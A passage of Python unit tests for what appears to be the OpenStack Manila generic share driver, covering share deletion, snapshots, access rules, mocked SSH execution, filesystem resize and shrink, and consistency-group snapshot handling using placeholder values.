CONF.set_default('driver_handles_share_servers', False) self._driver.delete_share(self._context, self.share) self._driver.service_instance_manager.get_common_server.\ assert_called_once_with() self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) self._driver.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_delete_share(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') self._driver.delete_share( self._context, self.share, share_server=self.server) self._helper_nfs.remove_export.assert_called_once_with( self.server['backend_details'], self.share['name']) self._driver._unmount_device.assert_called_once_with( self.share, self.server['backend_details']) self._driver._detach_volume.assert_called_once_with( self._driver.admin_context, self.share, self.server['backend_details']) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) self._driver.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_delete_share_without_share_server(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') self._driver.delete_share( self._context, self.share, share_server=None) self.assertFalse(self._helper_nfs.remove_export.called) self.assertFalse(self._driver._unmount_device.called) self.assertFalse(self._driver._detach_volume.called) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) def test_delete_share_without_server_backend_details(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') fake_share_server = { 'instance_id': 'fake_instance_id', 'ip': 'fake_ip', 'username': 'fake_username', 'password': 'fake_password', 'pk_path': 'fake_pk_path', 'backend_details': {} } self._driver.delete_share( self._context, self.share, share_server=fake_share_server) self.assertFalse(self._helper_nfs.remove_export.called) self.assertFalse(self._driver._unmount_device.called) self.assertFalse(self._driver._detach_volume.called) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) def test_delete_share_without_server_availability(self): self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_deallocate_container') self.mock_object( self._driver.service_instance_manager, 'ensure_service_instance', mock.Mock(return_value=False)) self._driver.delete_share( self._context, self.share, share_server=self.server) self.assertFalse(self._helper_nfs.remove_export.called) self.assertFalse(self._driver._unmount_device.called) self.assertFalse(self._driver._detach_volume.called) self._driver._deallocate_container.assert_called_once_with( self._driver.admin_context, self.share) self._driver.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_delete_share_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.delete_share, self._context, self.share, share_server=self.server) def test_create_snapshot(self): fake_vol = fake_volume.FakeVolume() fake_vol_snap = fake_volume.FakeVolumeSnapshot(share_id=fake_vol['id']) self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=fake_vol)) self.mock_object(self._driver.volume_api, 'create_snapshot_force', mock.Mock(return_value=fake_vol_snap)) self._driver.create_snapshot(self._context, fake_vol_snap, share_server=self.server) self._driver._get_volume.assert_called_once_with( self._driver.admin_context, fake_vol_snap['share_id']) self._driver.volume_api.create_snapshot_force.assert_called_once_with( self._context, fake_vol['id'], CONF.volume_snapshot_name_template % fake_vol_snap['id'], '' ) def test_delete_snapshot(self): fake_vol_snap = fake_volume.FakeVolumeSnapshot() fake_vol_snap2 = {'id': 'fake_vol_snap2'} self.mock_object(self._driver, '_get_volume_snapshot', mock.Mock(return_value=fake_vol_snap2)) self.mock_object(self._driver.volume_api, 'delete_snapshot') self.mock_object( self._driver.volume_api, 'get_snapshot', mock.Mock(side_effect=exception.VolumeSnapshotNotFound( snapshot_id=fake_vol_snap['id']))) self._driver.delete_snapshot(self._context, fake_vol_snap, share_server=self.server) self._driver._get_volume_snapshot.assert_called_once_with( self._driver.admin_context, fake_vol_snap['id']) self._driver.volume_api.delete_snapshot.assert_called_once_with( self._driver.admin_context, fake_vol_snap2['id']) self._driver.volume_api.get_snapshot.assert_called_once_with( self._driver.admin_context, fake_vol_snap2['id']) def test_ensure_share(self): vol1 = 'fake_vol1' vol2 = 'fake_vol2' self._helper_nfs.create_export.return_value = 'fakelocation' self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=vol1)) self.mock_object(self._driver, '_attach_volume', mock.Mock(return_value=vol2)) self.mock_object(self._driver, '_mount_device') self._driver.ensure_share( self._context, self.share, share_server=self.server) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self._driver._attach_volume.assert_called_once_with( self._context, self.share, self.server['backend_details']['instance_id'], vol1) self._driver._mount_device.assert_called_once_with( self.share, self.server['backend_details'], vol2) self._helper_nfs.create_export.assert_called_once_with( self.server['backend_details'], self.share['name'], recreate=True) def test_ensure_share_volume_is_absent(self): self.mock_object( self._driver, '_get_volume', mock.Mock(return_value=None)) self.mock_object(self._driver, '_attach_volume') self._driver.ensure_share( self._context, self.share, share_server=self.server) self._driver._get_volume.assert_called_once_with( self._context, self.share['id']) self.assertFalse(self._driver._attach_volume.called) def test_ensure_share_invalid_helper(self): self._driver._helpers = {'CIFS': self._helper_cifs} self.assertRaises(exception.InvalidShare, self._driver.ensure_share, self._context, self.share, share_server=self.server) @ddt.data(const.ACCESS_LEVEL_RW, const.ACCESS_LEVEL_RO) def test_allow_access(self, access_level): access = { 'access_type': 'ip', 'access_to': 'fake_dest', 'access_level': access_level, } self._driver.allow_access( self._context, self.share, access, share_server=self.server) self._driver._helpers[self.share['share_proto']].\ allow_access.assert_called_once_with( self.server['backend_details'], self.share['name'], access['access_type'], access['access_level'], access['access_to']) def test_allow_access_unsupported(self): access = { 'access_type': 'ip', 'access_to': 'fake_dest', 'access_level': 'fakefoobar', } self.assertRaises( exception.InvalidShareAccessLevel, self._driver.allow_access, self._context, self.share, access, share_server=self.server) def test_deny_access(self): access = 'fake_access' self._driver.deny_access( self._context, self.share, access, share_server=self.server) self._driver._helpers[ self.share['share_proto']].deny_access.assert_called_once_with( self.server['backend_details'], self.share['name'], access) @ddt.data(fake_share.fake_share(), fake_share.fake_share(share_proto='NFSBOGUS'), fake_share.fake_share(share_proto='CIFSBOGUS')) def test__get_helper_with_wrong_proto(self, share): self.assertRaises(exception.InvalidShare, self._driver._get_helper, share) def test__setup_server(self): sim = self._driver.instance_manager net_info = { 'server_id': 'fake', 'neutron_net_id': 'fake-net-id', 'neutron_subnet_id': 'fake-subnet-id', } self._driver.setup_server(net_info) sim.set_up_service_instance.assert_called_once_with( self._context, net_info) def test__setup_server_revert(self): def raise_exception(*args, **kwargs): raise exception.ServiceInstanceException net_info = {'server_id': 'fake', 'neutron_net_id': 'fake-net-id', 'neutron_subnet_id': 'fake-subnet-id'} self.mock_object(self._driver.service_instance_manager, 'set_up_service_instance', mock.Mock(side_effect=raise_exception)) self.assertRaises(exception.ServiceInstanceException, self._driver.setup_server, net_info) def test__teardown_server(self): server_details = { 'instance_id': 'fake_instance_id', 'subnet_id': 'fake_subnet_id', 'router_id': 'fake_router_id', } self._driver.teardown_server(server_details) self._driver.service_instance_manager.delete_service_instance.\ assert_called_once_with( self._driver.admin_context, server_details) def test_ssh_exec_connection_not_exist(self): ssh_output = 'fake_ssh_output' cmd = ['fake', 'command'] ssh = mock.Mock() ssh.get_transport = mock.Mock() ssh.get_transport().is_active = mock.Mock(return_value=True) ssh_pool = mock.Mock() ssh_pool.create = mock.Mock(return_value=ssh) self.mock_object(utils, 'SSHPool', mock.Mock(return_value=ssh_pool)) self.mock_object(processutils, 'ssh_execute', mock.Mock(return_value=ssh_output)) self._driver.ssh_connections = {} result = self._driver._ssh_exec(self.server, cmd) utils.SSHPool.assert_called_once_with( self.server['ip'], 22, None, self.server['username'], self.server['password'], self.server['pk_path'], max_size=1) ssh_pool.create.assert_called_once_with() processutils.ssh_execute.assert_called_once_with(ssh, 'fake command') ssh.get_transport().is_active.assert_called_once_with() self.assertEqual( self._driver.ssh_connections, {self.server['instance_id']: (ssh_pool, ssh)} ) self.assertEqual(ssh_output, result) def test_ssh_exec_connection_exist(self): ssh_output = 'fake_ssh_output' cmd = ['fake', 'command'] ssh = mock.Mock() ssh.get_transport = mock.Mock() ssh.get_transport().is_active = mock.Mock(side_effect=lambda: True) ssh_pool = mock.Mock() self.mock_object(processutils, 'ssh_execute', mock.Mock(return_value=ssh_output)) self._driver.ssh_connections = { self.server['instance_id']: (ssh_pool, ssh) } result = self._driver._ssh_exec(self.server, cmd) processutils.ssh_execute.assert_called_once_with(ssh, 'fake command') ssh.get_transport().is_active.assert_called_once_with() self.assertEqual( self._driver.ssh_connections, {self.server['instance_id']: (ssh_pool, ssh)} ) self.assertEqual(ssh_output, result) def test_ssh_exec_connection_recreation(self): ssh_output = 'fake_ssh_output' cmd = ['fake', 'command'] ssh = mock.Mock() ssh.get_transport = mock.Mock() ssh.get_transport().is_active = mock.Mock(side_effect=lambda: False) ssh_pool = mock.Mock() ssh_pool.create = mock.Mock(side_effect=lambda: ssh) ssh_pool.remove = mock.Mock() self.mock_object(processutils, 'ssh_execute', mock.Mock(return_value=ssh_output)) self._driver.ssh_connections = { self.server['instance_id']: (ssh_pool, ssh) } result = self._driver._ssh_exec(self.server, cmd) processutils.ssh_execute.assert_called_once_with(ssh, 'fake command') ssh.get_transport().is_active.assert_called_once_with() ssh_pool.create.assert_called_once_with() ssh_pool.remove.assert_called_once_with(ssh) self.assertEqual( self._driver.ssh_connections, {self.server['instance_id']: (ssh_pool, ssh)} ) self.assertEqual(ssh_output, result) def test_get_share_stats_refresh_false(self): self._driver._stats = {'fake_key': 'fake_value'} result = self._driver.get_share_stats(False) self.assertEqual(self._driver._stats, result) def test_get_share_stats_refresh_true(self): fake_stats = {'fake_key': 'fake_value'} self._driver._stats = fake_stats expected_keys = [ 'QoS_support', 'driver_version', 'share_backend_name', 'free_capacity_gb', 'total_capacity_gb', 'driver_handles_share_servers', 'reserved_percentage', 'vendor_name', 'storage_protocol', ] result = self._driver.get_share_stats(True) self.assertNotEqual(fake_stats, result) for key in expected_keys: self.assertIn(key, result) self.assertEqual(True, result['driver_handles_share_servers']) self.assertEqual('Open Source', result['vendor_name']) def _setup_manage_mocks(self, get_share_type_extra_specs='False', is_device_mounted=True, server_details=None): CONF.set_default('driver_handles_share_servers', False) self.mock_object(share_types, 'get_share_type_extra_specs', mock.Mock(return_value=get_share_type_extra_specs)) self.mock_object(self._driver, '_is_device_mounted', mock.Mock(return_value=is_device_mounted)) self.mock_object(self._driver, 'service_instance_manager') server = {'backend_details': server_details} self.mock_object(self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=server)) def test_manage_invalid_protocol(self): share = {'share_proto': 'fake_proto'} self._setup_manage_mocks() self.assertRaises(exception.InvalidShare, self._driver.manage_existing, share, {}) def test_manage_not_mounted_share(self): share = get_fake_manage_share() fake_path = '/foo/bar' self._setup_manage_mocks(is_device_mounted=False) self.mock_object( self._driver._helpers[share['share_proto']], 'get_share_path_by_export_location', mock.Mock(return_value=fake_path)) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, {}) self.assertEqual( 1, self._driver.service_instance_manager.get_common_server.call_count) self._driver._is_device_mounted.assert_called_once_with( fake_path, None) self._driver._helpers[share['share_proto']].\ get_share_path_by_export_location.assert_called_once_with( None, share['export_locations'][0]['path']) def test_manage_share_not_attached_to_cinder_volume_invalid_size(self): share = get_fake_manage_share() server_details = {} fake_path = '/foo/bar' self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=None)) error = exception.ManageInvalidShare(reason="fake") self.mock_object( self._driver, '_get_mounted_share_size', mock.Mock(side_effect=error)) self.mock_object( self._driver._helpers[share['share_proto']], 'get_share_path_by_export_location', mock.Mock(return_value=fake_path)) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, {}) self._driver._get_mounted_share_size.assert_called_once_with( fake_path, server_details) self._driver._helpers[share['share_proto']].\ get_share_path_by_export_location.assert_called_once_with( server_details, share['export_locations'][0]['path']) def test_manage_share_not_attached_to_cinder_volume(self): share = get_fake_manage_share() share_size = "fake" fake_path = '/foo/bar' fake_exports = ['foo', 'bar'] server_details = {} self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver, '_get_volume') self.mock_object(self._driver, '_get_mounted_share_size', mock.Mock(return_value=share_size)) self.mock_object( self._driver._helpers[share['share_proto']], 'get_share_path_by_export_location', mock.Mock(return_value=fake_path)) self.mock_object( self._driver._helpers[share['share_proto']], 'get_exports_for_share', mock.Mock(return_value=fake_exports)) result = self._driver.manage_existing(share, {}) self.assertEqual( {'size': share_size, 'export_locations': fake_exports}, result) self._driver._helpers[share['share_proto']].get_exports_for_share.\ assert_called_once_with( server_details, share['export_locations'][0]['path']) self._driver._helpers[share['share_proto']].\ get_share_path_by_export_location.assert_called_once_with( server_details, share['export_locations'][0]['path']) self._driver._get_mounted_share_size.assert_called_once_with( fake_path, server_details) self.assertFalse(self._driver._get_volume.called) def test_manage_share_attached_to_cinder_volume_not_found(self): share = get_fake_manage_share() server_details = {} driver_options = {'volume_id': 'fake'} self._setup_manage_mocks(server_details=server_details) self.mock_object( self._driver.volume_api, 'get', mock.Mock(side_effect=exception.VolumeNotFound(volume_id="fake")) ) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, driver_options) self._driver.volume_api.get.assert_called_once_with( mock.ANY, driver_options['volume_id']) def test_manage_share_attached_to_cinder_volume_not_mounted_to_srv(self): share = get_fake_manage_share() server_details = {'instance_id': 'fake'} driver_options = {'volume_id': 'fake'} volume = {'id': 'fake'} self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=volume)) self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[])) self.assertRaises(exception.ManageInvalidShare, self._driver.manage_existing, share, driver_options) self._driver.volume_api.get.assert_called_once_with( mock.ANY, driver_options['volume_id']) self._driver.compute_api.instance_volumes_list.assert_called_once_with( mock.ANY, server_details['instance_id']) def test_manage_share_attached_to_cinder_volume(self): share = get_fake_manage_share() fake_size = 'foobar' fake_exports = ['foo', 'bar'] server_details = {'instance_id': 'fake'} driver_options = {'volume_id': 'fake'} volume = {'id': 'fake', 'name': 'fake_volume_1', 'size': fake_size} self._setup_manage_mocks(server_details=server_details) self.mock_object(self._driver.volume_api, 'get', mock.Mock(return_value=volume)) self._driver.volume_api.update = mock.Mock() fake_volume = mock.Mock() fake_volume.id = 'fake' self.mock_object(self._driver.compute_api, 'instance_volumes_list', mock.Mock(return_value=[fake_volume])) self.mock_object( self._driver._helpers[share['share_proto']], 'get_exports_for_share', mock.Mock(return_value=fake_exports)) result = self._driver.manage_existing(share, driver_options) self.assertEqual( {'size': fake_size, 'export_locations': fake_exports}, result) self._driver._helpers[share['share_proto']].get_exports_for_share.\ assert_called_once_with( server_details, share['export_locations'][0]['path']) expected_volume_update = { 'name': self._driver._get_volume_name(share['id']) } self._driver.volume_api.update.assert_called_once_with( mock.ANY, volume['id'], expected_volume_update) self.fake_private_storage.update.assert_called_once_with( share['id'], {'volume_id': volume['id']} ) def test_get_mounted_share_size(self): output = ("Filesystem blocks Used Available Capacity Mounted on\n" "/dev/fake 1G 1G 1G 4% /shares/share-fake") self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(output, ''))) actual_result = self._driver._get_mounted_share_size('/fake/path', {}) self.assertEqual(1, actual_result) @ddt.data("fake\nfake\n", "fake", "fake\n") def test_get_mounted_share_size_invalid_output(self, output): self.mock_object(self._driver, '_ssh_exec', mock.Mock(return_value=(output, ''))) self.assertRaises(exception.ManageInvalidShare, self._driver._get_mounted_share_size, '/fake/path', {}) def test_get_consumed_space(self): mount_path = "fake_path" server_details = {} index = 2 valid_result = 1 self.mock_object(self._driver, '_get_mount_stats_by_index', mock.Mock(return_value=valid_result * 1024)) actual_result = self._driver._get_consumed_space( mount_path, server_details) self.assertEqual(valid_result, actual_result) self._driver._get_mount_stats_by_index.assert_called_once_with( mount_path, server_details, index, block_size='M' ) def test_get_consumed_space_invalid(self): self.mock_object( self._driver, '_get_mount_stats_by_index', mock.Mock(side_effect=exception.ManilaException("fake")) ) self.assertRaises( exception.InvalidShare, self._driver._get_consumed_space, "fake", "fake" ) def test_extend_share(self): fake_volume = "fake" fake_share = { 'id': 'fake', 'share_proto': 'NFS', 'name': 'test_share', } new_size = 123 srv_details = self.server['backend_details'] self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server) ) self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_detach_volume') self.mock_object(self._driver, '_extend_volume') self.mock_object(self._driver, '_attach_volume') self.mock_object(self._driver, '_mount_device') self.mock_object(self._driver, '_resize_filesystem') self.mock_object( self._driver, '_get_volume', mock.Mock(return_value=fake_volume) ) CONF.set_default('driver_handles_share_servers', False) self._driver.extend_share(fake_share, new_size) self.assertTrue( self._driver.service_instance_manager.get_common_server.called) self._driver._unmount_device.assert_called_once_with( fake_share, srv_details) self._driver._detach_volume.assert_called_once_with( mock.ANY, fake_share, srv_details) self._driver._get_volume.assert_called_once_with( mock.ANY, fake_share['id']) self._driver._extend_volume.assert_called_once_with( mock.ANY, fake_volume, new_size) self._driver._attach_volume.assert_called_once_with( mock.ANY, fake_share, srv_details['instance_id'], mock.ANY) self._helper_nfs.disable_access_for_maintenance.\ assert_called_once_with(srv_details, 'test_share') self._helper_nfs.restore_access_after_maintenance.\ assert_called_once_with(srv_details, 'test_share') self.assertTrue(self._driver._resize_filesystem.called) def test_extend_volume(self): fake_volume = {'id': 'fake'} new_size = 123 self.mock_object(self._driver.volume_api, 'extend') self.mock_object(self._driver, '_wait_for_available_volume') self._driver._extend_volume(self._context, fake_volume, new_size) self._driver.volume_api.extend.assert_called_once_with( self._context, fake_volume['id'], new_size ) self._driver._wait_for_available_volume.assert_called_once_with( fake_volume, mock.ANY, msg_timeout=mock.ANY, msg_error=mock.ANY, expected_size=new_size ) def test_resize_filesystem(self): fake_server_details = {'fake': 'fake'} fake_volume = {'mountpoint': '/dev/fake'} self.mock_object(self._driver, '_ssh_exec') self._driver._resize_filesystem( fake_server_details, fake_volume, new_size=123) self._driver._ssh_exec.assert_any_call( fake_server_details, ['sudo', 'fsck', '-pf', '/dev/fake']) self._driver._ssh_exec.assert_any_call( fake_server_details, ['sudo', 'resize2fs', '/dev/fake', "%sG" % 123] ) self.assertEqual(2, self._driver._ssh_exec.call_count) @ddt.data( { 'source': processutils.ProcessExecutionError( stderr="resize2fs: New size smaller than minimum (123456)"), 'target': exception.Invalid }, { 'source': processutils.ProcessExecutionError(stderr="fake_error"), 'target': exception.ManilaException } ) @ddt.unpack def test_resize_filesystem_invalid_new_size(self, source, target): fake_server_details = {'fake': 'fake'} fake_volume = {'mountpoint': '/dev/fake'} ssh_mock = mock.Mock(side_effect=["fake", source]) self.mock_object(self._driver, '_ssh_exec', ssh_mock) self.assertRaises( target, self._driver._resize_filesystem, fake_server_details, fake_volume, new_size=123 ) def test_shrink_share_invalid_size(self): fake_share = {'id': 'fake', 'export_locations': [{'path': 'test'}]} new_size = 123 self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server) ) self.mock_object(self._driver, '_get_helper') self.mock_object(self._driver, '_get_consumed_space', mock.Mock(return_value=200)) CONF.set_default('driver_handles_share_servers', False) self.assertRaises( exception.ShareShrinkingPossibleDataLoss, self._driver.shrink_share, fake_share, new_size ) self._driver._get_helper.assert_called_once_with(fake_share) self._driver._get_consumed_space.assert_called_once_with( mock.ANY, self.server['backend_details']) def _setup_shrink_mocks(self): share = {'id': 'fake', 'export_locations': [{'path': 'test'}], 'name': 'fake'} volume = {'id': 'fake'} new_size = 123 server_details = self.server['backend_details'] self.mock_object( self._driver.service_instance_manager, 'get_common_server', mock.Mock(return_value=self.server) ) helper = mock.Mock() self.mock_object(self._driver, '_get_helper', mock.Mock(return_value=helper)) self.mock_object(self._driver, '_get_consumed_space', mock.Mock(return_value=100)) self.mock_object(self._driver, '_get_volume', mock.Mock(return_value=volume)) self.mock_object(self._driver, '_unmount_device') self.mock_object(self._driver, '_mount_device') CONF.set_default('driver_handles_share_servers', False) return share, volume, new_size, server_details, helper @ddt.data({'source': exception.Invalid("fake"), 'target': exception.ShareShrinkingPossibleDataLoss}, {'source': exception.ManilaException("fake"), 'target': exception.Invalid}) @ddt.unpack def test_shrink_share_error_on_resize_fs(self, source, target): share, vol, size, server_details, _ = self._setup_shrink_mocks() resize_mock = mock.Mock(side_effect=source) self.mock_object(self._driver, '_resize_filesystem', resize_mock) self.assertRaises(target, self._driver.shrink_share, share, size) resize_mock.assert_called_once_with(server_details, vol, new_size=size) def test_shrink_share(self): share, vol, size, server_details, helper = self._setup_shrink_mocks() self.mock_object(self._driver, '_resize_filesystem') self._driver.shrink_share(share, size) self._driver._get_helper.assert_called_once_with(share) self._driver._get_consumed_space.assert_called_once_with( mock.ANY, server_details) self._driver._get_volume.assert_called_once_with(mock.ANY, share['id']) self._driver._unmount_device.assert_called_once_with(share, server_details) self._driver._resize_filesystem( server_details, vol, new_size=size) self._driver._mount_device(share, server_details, vol) self.assertTrue(helper.disable_access_for_maintenance.called) self.assertTrue(helper.restore_access_after_maintenance.called) @ddt.data({'share_servers': [], 'result': None}, {'share_servers': None, 'result': None}, {'share_servers': ['fake'], 'result': 'fake'}, {'share_servers': ['fake', 'test'], 'result': 'fake'}) @ddt.unpack def tests_choose_share_server_compatible_with_share(self, share_servers, result): fake_share = "fake" actual_result = self._driver.choose_share_server_compatible_with_share( self._context, share_servers, fake_share ) self.assertEqual(result, actual_result) @ddt.data({'consistency_group': {'share_server_id': 'fake'}, 'result': {'id': 'fake'}}, {'consistency_group': None, 'result': {'id': 'fake'}}, {'consistency_group': {'share_server_id': 'test'}, 'result': {'id': 'test'}}) @ddt.unpack def tests_choose_share_server_compatible_with_share_and_cg( self, consistency_group, result): share_servers = [{'id': 'fake'}, {'id': 'test'}] fake_share = "fake" actual_result = self._driver.choose_share_server_compatible_with_share( self._context, share_servers, fake_share, consistency_group=consistency_group ) self.assertEqual(result, actual_result) def test_create_consistency_group(self): FAKE_SNAP_DICT = get_fake_snap_dict() result = self._driver.create_consistency_group( self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_debug_log.call_count) self.assertEqual(1, self.mock_warning_log.call_count) self.assertIsNone(result) def test_delete_consistency_group(self): FAKE_SNAP_DICT = get_fake_snap_dict() result = self._driver.delete_consistency_group( self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_debug_log.call_count) self.assertIsNone(result) def test_create_cgsnapshot_no_cg_members(self): FAKE_SNAP_DICT = dict(get_fake_snap_dict(), cgsnapshot_members=[]) mock_snapshot_creation = self.mock_object(generic.GenericShareDriver, 'create_snapshot') result = self._driver.create_cgsnapshot( self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_debug_log.call_count) self.assertEqual(2, self.mock_warning_log.call_count) self.assertFalse(mock_snapshot_creation.called) self.assertEqual((None, None), result) @ddt.data( { 'delete_snap_side_effect': None, 'expected_error_log_call_count': 0, }, { 'delete_snap_side_effect': exception.ManilaException, 'expected_error_log_call_count': 1, } ) @ddt.unpack def test_create_cgsnapshot_manila_exception_on_create_and_delete( self, delete_snap_side_effect, expected_error_log_call_count): FAKE_SNAP_DICT = get_fake_snap_dict() # Append another fake share FAKE_SHARE = dict(FAKE_SNAP_DICT['cgsnapshot_members'][0]) FAKE_SNAP_DICT['cgsnapshot_members'].append(FAKE_SHARE) self.mock_object(generic.GenericShareDriver, 'create_snapshot', mock.Mock(side_effect=[ None, exception.ManilaException, ])) self.mock_object(generic.GenericShareDriver, 'delete_snapshot', mock.Mock(side_effect=delete_snap_side_effect)) self.assertRaises(exception.ManilaException, self._driver.create_cgsnapshot, self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(2, self.mock_debug_log.call_count) self.assertEqual(1, self.mock_warning_log.call_count) self.assertEqual(1, self.mock_exception_log.call_count) self.assertEqual(expected_error_log_call_count, self.mock_error_log.call_count) def test_create_cgsnapshot(self): FAKE_SNAP_DICT = get_fake_snap_dict() FAKE_SHARE_SNAPSHOT = { 'share_id': 'e14b5174-e534-4f35-bc4f-fe81c1575d6f', 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', } mock_snapshot_creation = self.mock_object(generic.GenericShareDriver, 'create_snapshot') result = self._driver.create_cgsnapshot( self._context, FAKE_SNAP_DICT, share_server=self.server) mock_snapshot_creation.assert_called_once_with(self._context, FAKE_SHARE_SNAPSHOT, self.server) self.assertEqual(2, self.mock_debug_log.call_count) self.assertEqual(1, self.mock_warning_log.call_count) self.assertFalse(self.mock_error_log.called) self.assertEqual((None, None), result) def test_delete_cgsnapshot_manila_exception(self): FAKE_SNAP_DICT = get_fake_snap_dict() self.mock_object(generic.GenericShareDriver, 'delete_snapshot', mock.Mock(side_effect=exception.ManilaException)) self.assertRaises(exception.ManilaException, self._driver.delete_cgsnapshot, self._context, FAKE_SNAP_DICT, share_server=self.server) self.assertEqual(1, self.mock_error_log.call_count) def test_delete_cgsnapshot(self): FAKE_SNAP_DICT = get_fake_snap_dict() FAKE_SHARE_SNAPSHOT = { 'share_id': 'e14b5174-e534-4f35-bc4f-fe81c1575d6f', 'id': '03e2f06e-14f2-45a5-9631-0949d1937bd8', } mock_snapshot_creation = self.mock_object(generic.GenericShareDriver, 'delete_snapshot') result = self._driver.delete_cgsnapshot( self._context, FAKE_SNAP_DICT, share_server=self.server) mock_snapshot_creation.assert_called_once_with(self._context, FAKE_SHARE_SNAPSHOT, self.server) self.assertEqual(2, self.mock_debug_log.call_count) self.assertEqual((None, None), result) def test_create_consistency_group_from_cgsnapshot_no_members(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = dict(get_fake_snap_dict(), cgsnapshot_members=[]) mock_share_creation = self.mock_object(generic.GenericShareDriver, 'create_share_from_snapshot') result = self._driver.create_consistency_group_from_cgsnapshot( self._context, FAKE_CG_DICT, FAKE_CGSNAP_DICT, share_server=self.server) self.assertFalse(self.mock_debug_log.called) self.assertFalse(mock_share_creation.called) self.assertEqual((None, None), result) def test_create_consistency_group_from_cgsnapshot(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = get_fake_snap_dict() FAKE_COLLATED_INFO = get_fake_collated_cg_snap_info() FAKE_SHARE_UPDATE_LIST = [ { 'id': '02a32f06e-14f2-45a5-9631-7483f1937bd8', 'export_locations': 'xyzzy', } ] self.mock_object(generic.GenericShareDriver, '_collate_cg_snapshot_info', mock.Mock(return_value=FAKE_COLLATED_INFO)) mock_share_creation = self.mock_object(generic.GenericShareDriver, 'create_share_from_snapshot', mock.Mock(return_value='xyzzy')) result = self._driver.create_consistency_group_from_cgsnapshot( self._context, FAKE_CG_DICT, FAKE_CGSNAP_DICT, share_server=self.server) self.assertEqual((None, FAKE_SHARE_UPDATE_LIST), result) self.assertEqual(1, self.mock_debug_log.call_count) mock_share_creation.assert_called_once_with( self._context, FAKE_COLLATED_INFO[0]['share'], FAKE_COLLATED_INFO[0]['snapshot'], share_server=self.server ) def test_collate_cg_snapshot_info_invalid_cg(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = dict(get_fake_snap_dict(), cgsnapshot_members=[]) self.assertRaises(exception.InvalidConsistencyGroup, self._driver._collate_cg_snapshot_info, FAKE_CG_DICT, FAKE_CGSNAP_DICT) def test_collate_cg_snapshot(self): FAKE_CG_DICT = get_fake_cg_dict() FAKE_CGSNAP_DICT = get_fake_snap_dict() FAKE_COLLATED_INFO = get_fake_collated_cg_snap_info() result = self._driver._collate_cg_snapshot_info( FAKE_CG_DICT, FAKE_CGSNAP_DICT) self.assertEqual(FAKE_COLLATED_INFO, result) @generic.ensure_server def fake(driver_instance, context, share_server=None): return share_server @ddt.ddt class GenericDriverEnsureServerTestCase(test.TestCase): def setUp(self): super(GenericDriverEnsureServerTestCase, self).setUp() self._context = context.get_admin_context() self.server = {'id': 'fake_id', 'backend_details': {'foo': 'bar'}} self.dhss_false = type( 'Fake', (object,), {'driver_handles_share_servers': False}) self.dhss_true = type( 'Fake', (object,), {'driver_handles_share_servers': True}) def test_share_servers_are_not_handled_server_not_provided(self): self.dhss_false.service_instance_manager = mock.Mock() self.dhss_false.service_instance_manager.get_common_server = ( mock.Mock(return_value=self.server)) self.dhss_false.service_instance_manager.ensure_service_instance = ( mock.Mock(return_value=True)) actual = fake(self.dhss_false, self._context) self.assertEqual(self.server, actual) self.dhss_false.service_instance_manager.\ get_common_server.assert_called_once_with() self.dhss_false.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) @ddt.data({'id': 'without_details'}, {'id': 'with_details', 'backend_details': {'foo': 'bar'}}) def test_share_servers_are_not_handled_server_provided(self, server): self.assertRaises( exception.ManilaException, fake, self.dhss_false, self._context, share_server=server) def test_share_servers_are_handled_server_provided(self): self.dhss_true.service_instance_manager = mock.Mock() self.dhss_true.service_instance_manager.ensure_service_instance = ( mock.Mock(return_value=True)) actual = fake(self.dhss_true, self._context, share_server=self.server) self.assertEqual(self.server, actual) self.dhss_true.service_instance_manager.ensure_service_instance.\ assert_called_once_with( self._context, self.server['backend_details']) def test_share_servers_are_handled_invalid_server_provided(self): server = {'id': 'without_details'} self.assertRaises( exception.ManilaException, fake, self.dhss_true, self._context, share_server=server) def test_share_servers_are_handled_server_not_provided(self): self.assertRaises( exception.ManilaException, fake, self.dhss_true, self._context) @ddt.ddt class NFSHelperTestCase(test.TestCase): """Test case for NFS helper of generic driver.""" def setUp(self): super(NFSHelperTestCase, 